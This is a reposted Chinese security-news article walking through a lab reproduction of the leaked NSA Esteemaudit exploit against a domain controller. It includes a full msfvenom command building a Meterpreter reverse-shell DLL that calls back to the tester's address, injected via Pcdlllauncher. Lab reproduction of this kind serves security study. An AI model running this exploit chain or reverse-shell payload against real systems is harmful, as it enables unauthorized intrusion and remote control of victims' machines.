當前位置:
首頁 > 新聞 > ShadowBroker釋放的NSA工具中Esteemaudit漏洞復現過程

ShadowBroker釋放的NSA工具中Esteemaudit漏洞復現過程


近日臭名昭著的方程式組織工具包再次被公開,TheShadowBrokers在steemit.com博客上提供了相關消息。以下是其中Esteemaudit漏洞復現過程。



前期準備





靶機環境



需要域控環境



Esteemaudit漏洞復現過程



use Esteemaudit使用漏洞模塊



設置目標IP和埠



然後基本上默認,基本配置如下:


運行後再進行配置。



然後基本上選擇相對應的設置,CallbackIp填自己的,埠隨便



然後配置DLL。注意這裡默認路徑基本上是不對,找到自己對應的文件路徑進行修改:



然後基本上配置如下



可以運行了





利用Pcdlllauncher注入DLL


使用Pcdlllauncher


use Pcdlllauncher



然後生成用於反彈shell的dll payload:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll



然後進行配置


找到自己對應的文件路徑修改




要注入的惡意DLL文件路徑



然後基本上默認,運行就行了,成功注入


查看Metasploit,成功返回shell



*本文作者:zusheng,轉載請註明來自FreeBuf.COM



喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 FreeBuf 的精彩文章:

800元打造物理解析度2K投影儀全攻略
技術流掛馬揭秘:Flash廣告與Sage2.0勒索軟體的「黑金搭檔」
如何使用加密的Payload來識別並利用SQL注入漏洞
影子經紀人曝光的NSA大殺器可能與Stuxnet相關

TAG:FreeBuf |

您可能感興趣

PowerGhost:集PowerShell和EternalBlue於一身的多功能挖礦工具
TensorFlow新工具 AutoGraph
MySQL 下 perror 工具查看 System Error Code 信息
Adobe收購3D編輯工具Substance開發商Allegorithmic
iOS滲透測試工具Part 1:App Decryption以及class-dump
Process-Forest-Window進程日誌分析工具;python版的BloodHound
Proofpoint:新的Office文檔漏洞利用工具包ThreadKit已被發現
場景文字圖像增廣工具 Scene Text Image Transformer
微軟買下性能分析工具Windows Performance Analyzer
Google發布了一套名為Material Theming的新工具
實現高速點擊的 Android Monkey 自動化工具 fastmonkey-代號 Maxim
Salesforce開源構建Einstein AI模型的工具
跳一跳工具py輔助 Python提示No module named sklearn 解決方法
WPSeku-Wordpress漏洞掃描工具
Nvidia 圖片風格轉換工具——FastPhotoStyle
clrinject:向CLR Runtimes和AppDomain中注入代碼的工具
Aqua推出開源Kubernetes滲透測試工具Kube-hunter
攝影師必備—Photoshop後期調色工具Camera Raw
Windows-Kernel-Explorer : 內核研究工具
StreetLight Data提供Traffic Diagnostics工具 優化城市交通擁堵及規劃方案